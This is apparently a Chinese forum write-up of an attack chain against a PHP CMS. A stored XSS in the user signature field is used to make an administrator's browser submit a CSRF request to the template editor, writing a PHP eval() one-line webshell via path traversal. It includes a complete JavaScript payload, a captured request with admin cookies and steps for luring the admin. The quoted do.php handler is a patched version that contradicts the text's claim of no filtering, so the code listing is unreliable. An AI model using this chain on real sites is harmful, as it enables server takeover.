这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题，官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS（存储型：用户签名原样入库、原样输出）。
漏洞文件：user/member/skin_edit.php
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:( \! K0 O/ P+ Z
0 x- t% n- M3 ~! R/ e9 |</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
( |8 H4 H, T# g* `
5 N! E6 u3 }, i% D# b/ b- F</textarea></td></tr>
user/do.php：
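if($op=='zl'){ //资料 -- profile update
    // Required-field check, unchanged from the original handler.
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));

    // $CS_Nichen/$CS_Email/$CS_City/$CS_QQ/$CS_Qianm/$CS_Sex come from the
    // request (how they are populated is not visible here) and were written
    // to the database verbatim. The stored signature is later echoed raw by
    // user/member/skin_edit.php, which is the stored-XSS sink. Encoding the
    // free-text fields for an HTML text context before they are persisted
    // covers every place the profile is rendered; output sites should still
    // escape as well.
    // NOTE(review): pass the site's charset as the third argument if the
    // install is not UTF-8 -- confirm against the config.
    $CS_Nichen = htmlspecialchars($CS_Nichen, ENT_QUOTES);
    $CS_Email  = htmlspecialchars($CS_Email, ENT_QUOTES);
    $CS_City   = htmlspecialchars($CS_City, ENT_QUOTES);
    $CS_QQ     = htmlspecialchars($CS_QQ, ENT_QUOTES);
    $CS_Qianm  = htmlspecialchars($CS_Qianm, ENT_QUOTES);
    // CS_Sex is interpolated unquoted into the statement below (presumably an
    // integer column), so force it to an integer instead of trusting the
    // request value.
    $CS_Sex = intval($CS_Sex);

    // NOTE(review): the values are still concatenated into the SQL string.
    // $db's API is not visible here; if it offers bound parameters or an
    // escaping helper, use that -- HTML encoding is not an SQL defence even
    // though ENT_QUOTES happens to neutralise the single quote.
    $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
    CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
    where CS_Name='".$cscms_name."'";

    if($db->query($sql)){
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
}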
没有过滤导致 XSS 产生：签名（CS_Qianm）等字段原样写库，又在 skin_edit.php 里原样 echo 到页面，属于存储型 XSS。
后台看了下，很奇葩的是模板编辑接口可以写任意格式的文件：skins.php?ac=xgmb&op=go 对 name 的扩展名没有限制（aaa.php 都能写），path 参数还能带 ../ 跳出模板目录；而且从抓到的包看请求体里只有 name 和 content 两个参数，没有 CSRF token，所以管理员只要带着登录态访问攻击者控制的页面就会被跨站提交。另外注意 Cookie 里直接带着 CS_AdminPassWord（密码 hash）和 CS_Quanx 权限串，是否直接拿它们做鉴权需要再看后台的登录校验代码。
抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造 JS 如下（放进签名里，由管理员的浏览器执行，以他的登录态提交上面那个 POST）：
<script>
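// Target of the forged request: the admin template editor on the vulnerable
// site. The original built this as "http://" + top.location.hostname, which
// drops the scheme and port (wrong URL on https or a non-80 port) and cannot
// be read at all if the payload ends up in a cross-origin frame. protocol +
// host of the current document keeps scheme and port and is always readable
// (location.origin is avoided because the target browser may not support it).
// The path=../../ component is what lets the editor write outside its own
// skins directory (see the captured request above).
var thisTHost = window.location.protocol + "//" + window.location.host +
    "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";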
/**
 * Builds a hidden POST form in the current document and submits it.
 *
 * This is the CSRF half of the chain: the form is submitted by the victim's
 * (the admin's) browser, so the request carries the admin cookies, and the
 * target endpoint accepts it without any anti-CSRF token (the captured
 * request above has only the two fields built here).
 *
 * @param {string} url  form action -- the admin template-editor URL
 * @param {string} data value of the `name` field -- the file name to write
 * @param {string} msg  value of the `content` field -- the file contents
 */
function PostSubmit(url, data, msg) {
    var form = document.createElement("form");
    form.method = "POST";
    form.action = url;

    var nameField = document.createElement("input");
    nameField.setAttribute("name", "name");
    nameField.setAttribute("type", "hidden");
    nameField.value = data;

    var contentField = document.createElement("input");
    contentField.setAttribute("name", "content");
    contentField.setAttribute("type", "hidden");
    contentField.value = msg;

    form.appendChild(nameField);
    form.appendChild(contentField);
    document.body.appendChild(form);
    form.submit();
}
// Fire the forged request: ask the template editor to create roker.php with a
// one-line PHP eval() backdoor as its contents (the same endpoint and fields
// as the captured request above).
(function () {
    var shellName = "roker.php";
    var shellBody = "<?php @eval($_POST[123]);?>";
    PostSubmit(thisTHost, shellName, shellBody);
})();
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的脚本。
然后用你的账号给管理员写一封私信，或者想办法让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 改成自己的）；脚本会在管理员的浏览器里以他的登录态提交那个 POST，于是在 skins\index\html\ 目录下生成 roker.php 一句话木马。
修复思路：输出签名等用户字段时做 HTML 实体编码（htmlspecialchars）；模板编辑接口对 name 做扩展名白名单、对 path 做规范化并限制在模板目录内，并给后台写操作加上 CSRF token。